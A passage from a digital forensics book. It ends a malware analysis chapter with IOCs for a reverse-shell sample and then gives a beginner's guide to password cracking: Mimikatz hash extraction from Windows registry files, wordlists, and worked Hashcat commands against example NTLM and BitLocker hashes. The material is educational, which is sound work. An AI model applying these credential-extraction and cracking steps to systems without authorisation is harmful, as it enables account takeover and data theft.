• SHA256 hash of bdw.py - f24721812d8ad3b72bd24792875a527740e0261c67c03fe3481be642f8a4f980
• Md5 hash of bdw.py - 34ca38da117d1bb4384141e44f5502de
• Bdw.py downloaded from maliciousdomain.cn
• Bdw.py reverse shell to IP 192.168.163.128 (maliciousdomain.cn)
• Bdw.py reverse shell on port 8443
Chapter 2 - Basic Malware Analysis 65
Conclusion
This was a simple example of how to conduct basic malware analysis. The tools and techniques
discussed in this scenario can be used in a real-world scenario to determine if a machine is infected
with malware and extract some IOCs. The malicious files used for this scenario and a copy of the
walkthrough can be found on my GitHub⁷³. You will need a system with netcat to receive the reverse
shell as well as fakedns⁷⁴ to simulate a DNS server to direct the malicousdomain.cn calls to your
attacker machine.
More advanced malware will require additional tools and techniques. The techniques to reverse
engineer malware to include decompiling, disassembling, and debugging is covered in courses such
as SANS FOR610 Reverse Engineering Malware⁷⁵. The FOR610 course is a good step up to the
next level if you enjoyed this basic malware analysis. The course also teaches some techniques
for deobfuscating code whereas this basic analysis only consisted of unobfuscated code.
Additional advanced topics to look into include techniques to recover encryption keys. Those
techniques are useful to decrypt source code of encrypted malware or to help recover keys to decrypt
files that have been encrypted by ransomware. Assembly language programming familiarity is
needed for debugging and reverse engineering of malware. Basic knowledge of JavaScript is also
useful for analyzing web-based malware.
You can also increase your skills by taking malware development course from Sektor7⁷⁶. Learning
to develop malware will help you better understand how to detect malware and will teach you
additional techniques used by modern malware. SANS also offers the advanced FOR710 course for
Reverse-Engineering Malware: Advanced Code Analysis⁷⁷.
If you enjoyed this walkthrough and would like to check out more, you can check out my GitHub⁷⁸
for a walkthrough on performing white box code analysis of a vulnerable web application and
coding a full chain exploit. I have solutions for various vulnerable web applications and binary
exploitation challenges and will be adding a couple of binary exploitation and reverse engineering
walkthroughs in the future. I can also add in intermediate malware analysis walkthroughs if there
is enough interest.
⁷³https://github.com/ApexPredator-InfoSec/Basic-Malware-Analysis
⁷⁴https://github.com/SocialExploits/fakedns/blob/main/fakedns.py
⁷⁵https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques/
⁷⁶https://institute.sektor7.net/red-team-operator-malware-development-essentials
⁷⁷https://www.sans.org/cyber-security-courses/reverse-engineering-malware-advanced-code-analysis/
⁷⁸https://github.com/ApexPredator-InfoSec
Chapter 3 - Password Cracking for
Beginners
By John Haynes⁷⁹ | GitHub⁸⁰ | Discord⁸¹
Disclaimer & Overview
This chapter is a beginner’s guide on how to crack passwords. While on the surface this may seem to
be something reserved for cybercriminals, there are legitimate reasons for a law-abiding individual
to understand this process. Firstly, those who work in penetration testing or a red team environment
will need to know how to do this task. Secondly, law enforcement may need to access data that is
password protected with the legal authority of a search warrant. Third, important data may need
to be recovered from a device after the owner is deceased for the estate or heirs. There may also
be other ways to legally access password-protected data such as forgotten passwords or security
concerns in a corporate environment. Finally, it is important for someone who wishes to keep their
data secure to understand this process to know why a strong password is important and how to test
the security of their passwords without compromising those passwords.
That being said, I do not condone, encourage, or support those who would use this information
for malicious or illegal means. This chapter will start with the fundamentals of hashing and end
with showing how a strong password makes a substantial difference when attempting to crack
complex passwords. I will also touch on more advanced concepts for custom wordlist generation
and optimization.
⁷⁹https://www.youtube.com/channel/UCJVXolxwB4x3EsBAzSACCTg
⁸⁰https://github.com/FullTang
⁸¹http://discordapp.com/users/167135713006059520
Chapter 3 - Password Cracking for Beginners 67
In digital forensics, the first challenge is to get the data in a state so that it can be analyzed. For those
that need to legally access the data, there should be something in here for you. For those that wish
to learn how to better secure their data, there should be something in here for you as well. Let’s get
started!
Password Hashes
At the fundamental level, a password is like a key that fits into and unlocks a particular lock. Only
you have the key, but anyone can come up and inspect the lock. With a mechanical lock, nobody
can see the internal functions of the lock without specialized tools like lock picks. If someone was
proficient at using lockpicks, they could theoretically determine the depth of each pin while picking
the lock to make a key that would unlock the lock.
The same sort of concept is true for passwords. Each password should have a unique algorithmic
hash. To obtain a hash, a complex mathematical algorithm is run against a string of data and the
output is an extremely unique character string. For some weaker hash algorithms, there have been
hash collisions where two different sets of data have resulted in the same outputted hash. However,
when considering human-generated passwords, it is normally not necessary to worry about hash
collisions. It is sufficient to say that if you have the hash of a password you have the password in an
encrypted state. The password hash is how the password is stored on any modern operating system
like Windows, macOS, or Linux or for encrypted containers like BitLocker or encrypted 7-Zip files.
With the right tools, that is the only part of the password that will be available for an examiner to
inspect, just like the mechanical part of a lock is the only thing to inspect on a locked door if someone
were to try and pick the lock. There are methods to prevent the extraction of a password hash, but
it is reasonable to attempt to find a method to extract a hash from a system if the individual has
physical access to the electronic device, encrypted file, or a forensic image (.E01, dd, or similar) of
an encrypted volume or file.
Therefore, if the password hash can be extracted, it can be attacked to attempt to crack the password.
Hashing algorithms are mathematically a one-way operation. If someone has a password hash, there
is no normal mathematical operation that can be performed to reverse engineer the original plaintext
password. Additionally, some hashing algorithms are more difficult to crack than others because the
speed of decryption is sacrificed for security. However, the user can guess the potential password,
hash it, and then compare the resulting hash against the known hash. If it is a match, then the
password is cracked. This would be a very slow method to do manually, but there is software like
Hashcat that can be used to automate this process to perform thousands of attempts per second. To
make the guessing more difficult, the system can implement what is known as “salt” into the hash
to obfuscate the hash and make it more difficult to crack.
A discussion of password hashes would not be complete without mentioning salted passwords. The
salt for a password is additional data that is added to the password before the hash algorithm is
applied to complicate the guessing of the password. Therefore, the salt would have to be known and
applied to each potential guess otherwise the hash would be incorrect even if the correct password
was guessed. The salt can be generated in several different ways and can be static or dynamic
Chapter 3 - Password Cracking for Beginners 68
depending on developer choice. Unfortunately, Windows does not salt the NTLM password hashes
that it generates so they are vulnerable to attack.
As was just mentioned, Windows stores password hashes in NTLM format. This is unfortunately a
very weak form of encryption as it is the equivalent of MD4 encryption. The VTech company was
compromised in 2015 by a SQL injection attack and when the password hashes were analyzed they
were determined to be encrypted with MD5. MD5 is considered to be a weak form of encryption
and some do not consider it to even be encryption as it is so weak. Windows uses even weaker
encryption for its passwords, and those passwords are not even salted to compensate for the weak
encryption! Windows has upgraded to NTLMv1 and NTLMv2 for some uses, but those are still weak
by most encryption standards. Even more concerning is these NTLM hashes of user passwords are
transmitted over the network for authentication between computers (Patton, 2022). This is one of
the most common passwords that users will use and can be extracted by several methods, including
packet sniffing. It is also nearly guaranteed to not be generated by a password manager as the user
has to physically enter the password into the keyboard.
Useful Software Tools
There is no reason to reinvent the wheel as in most situations someone else has already created a tool
that will perform the task needed. The same is true for using software to assist in cracking passwords.
The general workflow for cracking a password is hash extraction, hash identification, attacking the
hash with general methods, and attacking the hash with custom methods. Tools that can assist in
these phases are Mimikatz⁸², Hashcat⁸³, John the Ripper⁸⁴, Passware⁸⁵, Gov Crack⁸⁶, custom scripts
often shared on GitHub and many more. Some tools like Passware are paid tools, and while there
is nothing wrong with a paid tool, this paper will focus on using the free tool called Hashcat. Gov
Crack has a graphical user interface (GUI) while Hashcat and John the Ripper use command-line
interfaces (CLI). Normally GUI interfaces allow for ease of access but tend to lack the flexibility of
CLI tools. Nearly all of the custom scripts that are used for hash extraction and are posted on GitHub
are going to be CLI-based tools. If the reader is unfamiliar with the command line, that should not
be a limiting factor for at least understanding the methods discussed in this paper and there will
be step-by-step instructions on how to crack a password hash in Hashcat. The focus on a particular
set of tools over another is due to personal experience with certain tools and no bias towards any
particular tool is intended as many tools can do the same thing and overlap with each other with
certain functions.
⁸²https://github.com/gentilkiwi/mimikatz
⁸³https://hashcat.net/hashcat/
⁸⁴https://github.com/openwall/john
⁸⁵https://www.passware.com/
⁸⁶https://www.govcrack.com/
Chapter 3 - Password Cracking for Beginners 69
Hash Extraction Techniques
One common method to extract an NTLM hash is to use Mimikatz, but it is widely recognized as
malware by most anti-virus software. If the individual has access to the forensic image (an .E01
or similar) of the hard drive of the computer, then Mimikatz should be used against the SAM and
SYSTEM registry files found in C:WindowsSystem32config, assuming BitLocker or another form
of encryption is not present. Even with live access to a machine, administrator rights and a forensic
tool such as FTK Imager⁸⁷, preferably preloaded on a USB drive, will be required to copy the registry
files as a simple copy/paste or drag-and-drop method will not work. This is just one way to obtain
an NTLM hash as it can also be obtained by observing network traffic. In general, this is a great
place to start when trying to crack passwords and try out different methods as the NTLM hash uses
a weak encryption method.
If the examiner is looking at an APFS encrypted volume from a MacBook, it is important to realize
that the password for the encrypted volume is the same as the password used to log into the
system. However, this hash uses a strong encryption method and will take much longer to crack
as compared to an NTLM hash. To extract the hash, there are tools available like the one from user
Banaanhangwagen⁸⁸ on GitHub. This will require using Linux to run the tool and extract the hash
from a raw or .dd forensic image.
Other encryption methods include BitLocker, zipped or compressed files, password-protected Word
documents, and many more. Generally speaking, some smart person somewhere has found out how
to extract the hash and has shared that information for that particular situation. The examiner
needs to search for hash extraction of a particular make, model, file system, software version, or a
combination of those and similar attributes. John the Ripper⁸⁹ is a great place to start when looking
for how to extract a hash. Also as a general rule, the hash is likely to be stored in plain text somewhere
in the hex (the raw data) on an electronic device. If the examiner is willing to poke around and search
the hex, they may be able to find the password hash assuming the correct decoding method is used.
This is not a hard-fast rule by any means, as there are complex methods of preventing external access
to protected memory areas. For example, at the time of writing this, I know of no known method to
extract a hash from a Chromebook even though it is possible to log into a Chromebook without it
being connected to the internet, implying that a hash of the user’s password must be stored locally
on the device.
⁸⁷https://www.exterro.com/ftk-imager
⁸⁸https://github.com/Banaanhangwagen/apfs2hashcat
⁸⁹https://github.com/openwall/john
Chapter 3 - Password Cracking for Beginners 70
Hash Identification
There may be times when a password hash has been located but the hash type is unknown. Hashcat
has an entire wiki including example hashes that can aid in this process. The example hashes are
located on the Hashcat Wiki⁹⁰ and can help with the hash identification of an unknown hash.
A simple Google search for “Hash Identification” results in multiple online tools that can help
identify the type of hash, be it NTLM, SHA-256, or many others. Several websites include Skerritt⁹¹,
Hashes.com⁹² or Onlinehashcrack.com⁹³. Be wary of using these or any other websites for sensitive
hashes as the website now has the actual hash. For advanced examiners who do not want to use an
online tool, Kali Linux also has an offline tool called Hash-Identifier⁹⁴ that can be downloaded and
used locally so the hash is not shared.
Attacking the Hash
Once the type of hash is identified, it is time to attempt to crack the hash. The simplest yet least
secure method of cracking a password from a hash is once again to use an online resource. Some of
the previously mentioned websites also offer services that will attempt to crack a hash, but those are
limited. The use of a password cracking tool such as Hashcat is highly recommended as it allows
for a much more powerful, robust, and secure method of cracking a password hash.
Here is a hash taken from the Hashcat Wiki: b4b9b02e6f09a9bd760f388b67351e2b. This is an NTLM
hash of a word in the English language. If you have visited the website then it is easy to determine
what this hash is, but let’s assume that we know nothing about this hash other than it was extracted
from a Windows machine and we wanted to crack this hash using Hashcat. Recall that the method of
cracking this password has to be coming up with our potential password, hashing it, and comparing
the two hashes until we find a match. This is a process Hashcat will automate for us. So if we get it
wrong, the worst that will happen is we will move on to the next potential password and try again.
Therefore, there are two primary methods of attacking a password, a brute-force method, and a more
focused attack. An exhaustive brute-force attack would take the combination of all possible symbols
on the keyboard and iterate through them. This is not ideal, but let’s explore the mathematical reason
why it is not the best method before explaining a better method.
If an exhaustive attack was to be performed against a password, that would mean that every possible
permutation of all possible characters, numbers, and symbols on the keyboard would be attempted.
For the standard English QWERTY keyboard, there are 10 digits 0123456789, 26 lowercase letters
abcdefghijklmnopqrstuvwxyz, 26 upper case letters, ABCDEFGHIJKLMNOPQRSTUVWXYZ, and 33 special
characters or including symbols, !@#$%^&*()-_=+[{]}|;:'",<.>/? . Note that space or the spacebar
is also included in the special character count. Adding these together results in 10 + 26 + 26 + 33 = 95
⁹⁰https://hashcat.net/wiki/doku.php?id=example_hashes
⁹¹https://nth.skerritt.blog/
⁹²https://hashes.com/en/tools/hash_identifier
⁹³https://www.onlinehashcrack.com/hash-identification.php
⁹⁴https://www.kali.org/tools/hash-identifier/
Chapter 3 - Password Cracking for Beginners 71
or ninety-five total possible characters that can be used at any point in a password, assuming they
are all allowed for use in a password. So for a single character password, there are only 95 possible
combinations. For a two-character password, there are 95 x 95 = 9,025 possible combinations. A
three-character password has 95 x 95 x 95 (or 95³) = 857,375 combinations, a four-character has
95⁴ = 81,450,625 combinations, and a very short five-character password has an astonishing 95⁵ =
7,737,809,375 password combinations, over seven billion! Even a meager eight-character combination
has over six quadrillion (a quadrillion is the name of the number just beyond trillion) possible
combinations for just the eight characters alone! Not only does this show the difficulty of using
every possible character, but it also shows the strength of using unusual symbols in passwords.
Even with modern computing that is capable of computing thousands of possible passwords per
second, it could take decades or longer to attempt to crack an eight-character password using this
method using normal computers. We need a better method!
So to speed up this process we need to make some assumptions about the original password rather
than guessing random characters. This brings up the primary weakness and therefore the best
method of attacking passwords once the examiner has the hash. Since most passwords must be
remembered by the user, it is very likely to contain a word in a language that the user knows. The
total number of guesses can be greatly reduced by avoiding letter combinations that are not words.
The total number of words in the 2022 Oxford English dictionary is over 600,000 words, but this does
include outdated, obsolete, and obscure words. Still, this is a huge improvement over even a short
three-letter permutation!
It is also common to add numbers or symbols to the end of the password. So we can also add numbers
to the end of a valid word and try those combinations. Sophisticated users may decide to use “leet
speak⁹⁵” and replace letters like ‘S’ with the number ‘5’, the letter ‘A’ with the number ‘4’, the letter
‘E’ with the number ‘3’, the letters ‘I’ or ‘l’ with the number ‘1’ because they look similar to the
corresponding letter. For example, the word “Apples” may become “4pp135” when using leet speak.
Finally, the addition of symbols is common at the end of the password, so common symbols like “!”
can be added to the end (Picolet, 2019). This is by no means an exhaustive list, but this is a good
starting point considering the alternative of a true brute force attack.
⁹⁵https://en.wikipedia.org/wiki/Leet
Chapter 3 - Password Cracking for Beginners 72
Wordlists
Now that we know a better method, we need to come up with a way to use that method to attack
passwords. The simplest method would be to use a list of words or a wordlist of possible passwords.
Just like it sounds, it is a list of possible passwords that already have symbols and numbers added to
them. When using a wordlist to attack a password, it is often called a dictionary attack. It is possible
to manually build our wordlist, but that is a very time-intensive task as we would not only need to
create useful passwords but avoid duplicates. Fortunately, there are prebuilt wordlists that we can
use.
When companies are hacked, a part of the data that is often stolen is the passwords. Companies
should encrypt their data, specifically user passwords, but this is not always the case. In 2009, the
social gaming company RockYou was compromised by a SQL injection attack. The hacker was able
to gain access to over 32 million accounts and they were storing passwords in the clear, which
means that there was no encryption whatsoever on the passwords as they were stored in plain text
(Cubrilovic, 2009). This list of passwords has become known as the rockyou list and is commonly
used as a starting point for dictionary attacks. Future breaches where the passwords have been
compromised and cracked have also been added to wordlists. It is important to note that a good
password list will not have duplicates of passwords due to deduplication. This is a key way to save
time when cracking passwords by not attempting the same password multiple times.
A good online resource where wordlists are compiled and ranked is Weakpass.com⁹⁶ (W34kp455,
2014). On this site, wordlists are ranked by order of popularity and functionality from 0 to 100
and using a color-coding system that corresponds with the numerical ranking. Note how there are
varying sizes of lists, ranging from over 400GB to only a few bytes in size. The first several wordlists
for download may not be ranked very high being color-coded red and only being in the single
digits. Selecting “Lists” and selecting “Medium” should display the original rockyou wordlist as
rockyou.txt on the first page with just over 14 million unique passwords. When selecting “Lists”
from the horizontal menu and selecting “All” we can sort all lists by popularity. Near the top of
the list should be the cyclone.hashesorg.hashkiller.combined.txt password list with about 1.5
billion total passwords. This list is one of the top-ranked lists while only being just over 15GB in
size. I would recommend using this list and I use it frequently because it is a good combination
of reduced size yet it still has some complexity to crack most common passwords. The total time
to iterate through the list is not unreasonable for many password hash types and stands a decent
chance of cracking many passwords with a straight dictionary attack. The “All-in-One” tab allows
for downloading a deduplicated version of all passwords on the site in various lengths for different
applications, but know that a longer list will take longer to complete than a shorter list. If you
haven’t noticed, there is also an estimated time to iterate through the list for a particular password
type under each list. While this can vary widely between different computers, it does a good job of
showing the relative time difference it takes to attempt that list against the different hash types. If
the 15GB password list is too large for you, here⁹⁷ is a smaller list that is not posted on Weakpass.
⁹⁶https://weakpass.com/
⁹⁷https://github.com/FullTang/AndroidPWList
Chapter 3 - Password Cracking for Beginners 73
This list combines several of the smaller wordlists from Weakpass and uses a few other techniques
for an uncompressed size that is just under 1GB in size. If you plan on installing and using Hashcat,
I would strongly recommend downloading at least one list of your choice.
Chapter 3 - Password Cracking for Beginners 74
Installing Hashcat
Now that we know some of the more common methods used to create passwords, and we have
access to a good list of millions of potential passwords, we can attempt to crack the example hash
using Hashcat. The most recent version of Hashcat can be securely downloaded here⁹⁸ (Hashcat -
Advanced Password Recovery, n.d.). Considering the type of calculations performed, it is much more
efficient to use the video card of a computer to perform these calculations rather than use the CPU.
This may cause some compatibility issues, and if so help on how to install Hashcat can be found on
the Hashcat Discord server⁹⁹. I would encourage anyone who has not used Hashcat or even if they
have not used a command-line tool to follow along at this point on their own Windows machine
even if you have not extracted any hashes up to this point. We will crack the previously mentioned
example hash (b4b9b02e6f09a9bd760f388b67351e2b) from Hashcat’s website here shortly!
Once Hashcat is installed, it needs to be launched from the command line, or command
prompt, assuming the user is using a Windows system. The simplest method to launch a
command prompt window in the correct location is to navigate to where Hashcat is installed
(C:WindowsProgramshashcat-6.2.5 or similar) using File Explorer, click the white area next to
the path so that the path turns blue, type cmd and press enter. A black window with white text
should appear. If you have never used the command line before, congratulations on opening your
first terminal window!
The next step is to launch Hashcat in help mode. This will also see if the correct drivers are installed
to allow for Hashcat to run. Simply type hashcat.exe -h in the command prompt. It is possible
that an error occurred stating an OpenCL, HIP, or CUDA installation was not found. If this is the
case, I would recommend typing Device Manager in the search bar next to the Windows Start menu
and then selecting Display adapters to determine the type of video card installed on the computer.
Beyond this, it will require downloading the required drivers from a trusted source to continue using
Hashcat. Once again, additional help on how to install Hashcat can be found on the Hashcat Discord
Server¹⁰⁰.
If the hashcat.exe -h is successful, then there should be a large amount of output on the screen
showing options, hash modes, and examples, and should end with some links to the Hashcat website.
I find it helpful to save this help information to a simple text file for easy reference. That can be done
by pressing the up arrow on the keyboard to display hashcat.exe -h again, but before pressing enter
add > Help.txt to the end of the command for the total command of hashcat.exe -h > Help.txt.
This will create a text file in the same folder with the output from the help command which can be
opened in Notepad or similar for quick reference while keeping the command prompt window free
to run Hashcat.
Open the Help.txt that was just created in the hashcat-6.2.5 folder. Under - [ Hash Modes ] - it
shows the numerous types of hashes that can be attacked (and possibly cracked) assuming the hash
is properly extracted. Scrolling to the bottom shows some example commands to run Hashcat under
⁹⁸https://hashcat.net/hashcat/
⁹⁹https://discord.gg/vxvGEMuemw
¹⁰⁰https://discord.gg/vxvGEMuemw
Chapter 3 - Password Cracking for Beginners 75
- [ Basic Examples ] -. Note that the first Attack-Mode is a Wordlist, but there is also a Brute-
Force option. This is not a true brute force method as was discussed earlier as it does not use all the
possible symbols on the keyboard nor does it use uppercase letters except for the first character. One
advantage is that it does not require a dictionary or wordlist to crack a password, so it has its uses.
Let’s break down this command.
Under example command, the first word is hashcat. It can also be hashcat.exe. This is simple, we
are just calling the executable file, but we need to give some input or arguments to the program.
The next thing we see is -a and then a number followed by -m followed by another number. At the
top of the help file, we see under - [ Options ] - it explains -a as the attack-mode and -m as the
hash-type. Both of these are required, but the order is not an issue as they can be in either order,
but we will follow the order shown in the example. Scrolling back down towards the bottom we
find - [ Attack Modes ] - where it shows the types of attacks. Brute-Force is 3 while Straight is
0. Brute-Force is Hashcat’s version of brute-force that was just briefly mentioned, while Straight is
a dictionary attack using a wordlist. Now for the other required argument, the -m. This stands for
hash-type, so we scroll up to the bulk of the help file under - [ Hash Modes ] - and see all the
different types. We know this is an NTLM hash, so we need to find the hash-type for NTLM in all
of that noise. Rather than manually searching, press CTRL + F to open the find menu and type NTLM.
You may get some results like NetNTLMv1, NetNTLMv1+ESS, or NetNTLMv2 and you may have to change
your direction of searching to find matches, but you should be able to find just NTLM all on one line
with a mode of 1000. Now that we know the required parameters for our two required arguments,
onto how to input the hash itself into Hashcat.
When it comes to the hash itself, Hashcat will accept the hash in one of two ways. It can either be
pasted directly into the command line, or it can be put into a simple text (.txt) file with one hash and
only one hash per line. If a text file containing multiple hashes is used, it needs to be all hashes of
the same type, like multiple NTLM hashes or multiple SHA-256 hashes, with each hash on its own
line. If attacking multiple hashes, the file method will be faster than trying to crack them one at a
time but it will be slower than a single hash. Pasting directly into the command line can be faster
if the hash is already extracted, but a few seconds taken to format the hash in a text file right after
extraction may be better in some situations.
The example command shows some arguments like ?a?a?a?a?a? after the example0.hash, but
those are not required. Other arguments can be seen towards the top of the help file, but
those are optional. We now know everything required to crack this example NTLM hash!
b4b9b02e6f09a9bd760f388b67351e2b.
Chapter 3 - Password Cracking for Beginners 76
“Brute-Forcing” with Hashcat
Go to the command line where we typed in hashcat.exe -h and type hashcat.exe -a 3 -m 1000
b4b9b02e6f09a9bd760f388b67351e2b and hit enter. There should be a wall of white text and then
it will stop and it should show Cracked partway up on the screen! Above the Cracked notification,
there will be the hash and at the end, it will show b4b9b02e6f09a9bd760f388b67351e2b:hashcat.
This means the password was hashcat, as can be seen at the top of the Hashcat Wiki webpage. If
this is your first time cracking a password then congratulations! You just cracked your first password
hash! Now let’s examine what Hashcat did during that wall of white text.
Scrolling up we can see the first block of text similar to the block of text at the end, but instead of
saying Cracked it says Exhausted. Looking at the Guess.Mask row in the first column we see a ?1
[1], and on the next row we see a Guess.Charset. On the Guess.Charset row there it shows the -1
and it is followed by a ?l?u?d. To know what those mean, we need to go back to our help file. Under
- [ Built-in Charsets ] - close to the bottom we see the l showing all lowercase characters, the u
showing all uppercase characters, and the d is all digits from 0 to 9. Putting it all together this means
Hashcat tried all lowercase, uppercase, and digits for a password length of 1 before exhausting and
moving on. Notice how at the top it showed Approaching final keyspace - workload adjusted.
and that means that Hashcat realizes it is about to come to the end of its current process and it is
thinking about what it needs to do next.
The second block shows a Guess.Mask of ?1?2 [2]. Therefore, there was a total of two characters,
but this time it is a little different. The ?2 is only the ?l and ?d meaning for the second character it
only tried lowercase and digits, but for the first character it was still a ?1 so it tried lower, upper, and
digits like in the first block. The third block is a Guess.Mask of ?1?2?2 [3], so three characters total
but only trying uppercase, lowercase, and digits for the first and trying lowercase and digits for the
other two. The fourth, fifth, and sixth blocks all show uppercase, lowercase, and digits for the first
character with lowercase and digits for the rest. The seventh block is where it was cracked, using
the same Guess.Mask format of ?1?2?2?2?2?2?2. The password was not long enough to see for this
example, but if we didn’t crack it on seven characters it would keep getting longer, and eventually
the ?3 would be used which would be added to the end which would also try the following five
symbols of *!$@_ in addition to lowercase and digits for the last character.
Chapter 3 - Password Cracking for Beginners 77
Hashcat’s Potfile
This worked for this password, but for more complicated passwords we can see where it has its
limitations. That is why we need a robust wordlist. So let’s try and crack this password again using
a wordlist, and in doing so we will discover a useful function of Hashcat. First, find the wordlist
that you previously downloaded in File Explorer and unzip it. It may not have a file extension, but
Hashcat doesn’t care nor would it be likely that you could open the file in normal Notepad anyway
as it is probably going to be too big for the standard version of Notepad. If you want to see the
contents, you should be able to use another text editor like Notepad++ for smaller wordlists, but it is
by no means required. Let’s go back to the command line where we just cracked the hash and type
out a new command. Type hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b not
forgetting to put a single space after the hash but don’t hit enter just yet. Hashcat needs the path for
the wordlist, note how we are using -a 0 instead of -a 3. If you are savvy with the command line,
you could enter the path of the file (not forgetting quotes if there are any spaces), or you could copy
the path from the File Explorer window (where we typed cmd earlier to open our command prompt
window) and then add the file name, but there is an easier way that some may consider cheating.
If you are not cheating you are not trying, right? The easiest way is to just drag and drop the
uncompressed wordlist into the black area of the command prompt window and it should populate
the whole path to the file in the command line. The whole command should look something like this,
hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:My FolderMy Downloaded
Wordlist". There may or may not be quotes around the path depending on if there are spaces in the
folder and subfolders or the file name. Hit enter and see what happens.
It should have finished very quickly and displayed a notification of INFO: All hashes found in
potfile! Use --show to display them. Well, that is interesting, what is a potfile? Simply put,
the potfile is where Hashcat automatically stores hashes it cracks with the corresponding password
in plain text. This is very useful to make sure that time is not wasted trying to crack passwords
that have already been cracked and to make sure a cracked password is saved in case of power
failure. It would be most unfortunate if a password was cracked before the examiner could see
it and the power went out to the machine that was not hooked up to a Universal Power Supply
due to budgetary concerns. Anyway, go to the hashcat-6.2.5 folder where hashcat.exe is located,
find the file named hashcat.potfile and open using Notepad or the text editor of your choice.
Assuming this is your first time using a freshly downloaded Hashcat, there will only be one entry,
b4b9b02e6f09a9bd760f388b67351e2b:hashcat. This is nice to prevent us from wasting time trying
to crack it again, but we want to see how to try and crack it using other methods. Either delete
the single entry from the potfile, save, and close, or just delete the whole potfile as Hashcat will
automatically generate a new one upon cracking another password.
Chapter 3 - Password Cracking for Beginners 78
Dictionary (Wordlist) Attack with Hashcat
Go back to the command prompt and press the up arrow on the keyboard. Your previously typed
command of hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:My FolderMy
Downloaded Wordlist" or similar should appear. Press Enter to run the command again. Now
it should start processing, but it will stop after a moment and display something like Watchdog:
Temperature abort trigger set to 90c. As a side note, this is nice to know that Hashcat has
built-in safety procedures to help prevent the overheating of video cards and will slow down its
processing speed if the GPU (aka video card) gets too hot. Anyway, after a few seconds, it should
display something like Dictionary cache building "D:My FolderMy Downloaded Wordlist":
1711225339 bytes (10.61%) with the percentage increasing every few seconds. This is normal and
depending on the size of the wordlist it might take a minute or two. This is required after the first
time starting a new wordlist, but as long as the location of the wordlist does not change it will not
need to build the dictionary each time. Once the dictionary is built, it will display the following line:
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>. This shows what commands we
can enter while it is processing. It would be nice to know what is going on, so press the s key.
The first thing I look at is the Time.Estimated row and it will show an estimated end date and time
and estimated duration. This is where times can vary greatly based on the type of GPU and length
of the wordlist. Even if a longer wordlist was chosen, it should not take long to crack the password.
This is assuming that the word “hashcat” is in the dictionary, but hopefully it is there. This method
will likely take a bit longer than the brute-force method, but it is much more robust and is one of
the best methods for cracking passwords. We are going to try one more method for now, so go back
to the potfile and delete the most recent entry from the potfile or just delete the whole potfile.
Chapter 3 - Password Cracking for Beginners 79
Dictionary + Rules with Hashcat
The obvious weakness of the dictionary attack is the password has to be in a precompiled dictionary,
but what if it is a complicated password not in a wordlist? What if the user made a password
that used unusual symbols or used numbers at the beginning, used numbers instead of letters,
or added an unusual number of symbols to the end? This can be cracked by Hashcat by using a
combined dictionary and rule attack. Hashcat comes preloaded with rules, and additional rules can
be downloaded just like wordlists can be downloaded. At this time, I have not found any rules that
are noticeably superior to the rules that come standard with Hashcat but it is left up to the examiner
to decide what they want to use.
After deleting the most recent entry in the potfile, check the hashcat-6.2.5 folder and there should
be a folder named rules. Inside the rules folder, there are plenty of prebuilt rules. My personal
favorite is the onerulestorulethemall rule as the name has a nice ring to it. It is also a good rule
in general, but again there is mostly personal preference and trial and error. It is worth mentioning
that while these rules are only a few kilobytes in size, they can add a substantial amount of time to
how long it takes to process a hash as all commands in each rule will be applied to each potential
password in a wordlist. Just like with dictionary attacks, a bigger rule will take longer and yield
more potential passwords but a smaller rule will be faster but with fewer generated passwords.
Go back to the command prompt and press the up arrow. Adding a rule to a dictionary attack is
quite easy, we just need to add a -r followed by the path to the rule file after the dictionary at the
end of the command. Just add -r to the end of the command, put a space, then drag and drop the
rule of your choice into the command prompt window. The command should look something like
hashcat.exe -a 0 -m 1000 b4b9b02e6f09a9bd760f388b67351e2b "D:My FolderMy Downloaded
Wordlist" -r "D:hashcat-6.2.5rulesonerulestorulethemall.rule". Once syntax looks good,
press enter. This time the dictionary should not have to compile, as it will display Dictionary cache
hit: and then information on the location of the dictionary. Press the s key on the keyboard to see
the status, and note how the Time.Estimated row has increased, possibly to a day or more. Hopefully,
it will not take longer than a few minutes to crack our example hash again. This method does take
longer, but again we are attacking the hash in a way that will crack more complicated passwords
than the previously discussed methods.
Chapter 3 - Password Cracking for Beginners 80
Robust Encryption Methods
Up to now, we have only cracked an NTLM hash, but what about more robust
encryption methods? Go to the Hashcat Example Hashes¹⁰¹ and search for Bit-
Locker that should be mode 22100. The resulting hash should be as follows: $bit-
locker$1$16$6f972989ddc209f1eccf07313a7266a2$1048576$12$3a33a8eaff5e6f81d907b591$60$3
16b0f6d4cb445fb056f0e3e0633c413526ff4481bbf588917b70a4e8f8075f5ceb45958a800b42cb7ff9b7f5
e17c6145bf8561ea86f52d3592059fb.
This is massive compared to the NTLM hash! Try it in Hashcat using the following command:
hashcat.exe -a 3 -m 22100 $bitlocker$1$16$6f972989ddc209f1eccf07313a7266a2$1048576$12$3a3
3a8eaff5e6f81d907b591$60$316b0f6d4cb445fb056f0e3e0633c413526ff4481bbf588917b70a4e8f8075f5
ceb45958a800b42cb7ff9b7f5e17c6145bf8561ea86f52d3592059fb
The brute-force starts at four characters because BitLocker originally required a minimum password
length of four so Hashcat is smart enough to not waste time trying less than four characters when
attacking a BitLocker password. For my computer, it shows an estimated time of 1 hour and 19
minutes for just 4 characters. If I let it run and go to 5 characters, it shows it will take 2 days
to just try 5 characters! Your computer may have different estimated times, but unless you have
a really good gaming computer or are running Hashcat on a computer designed for mining
cryptocurrency you are probably seeing similar numbers. Trying the same BitLocker hash but
just using a dictionary attack with no rules against the cyclone.hashesorg.hashkiller.combined
dictionary shows an estimated time of 28 days!
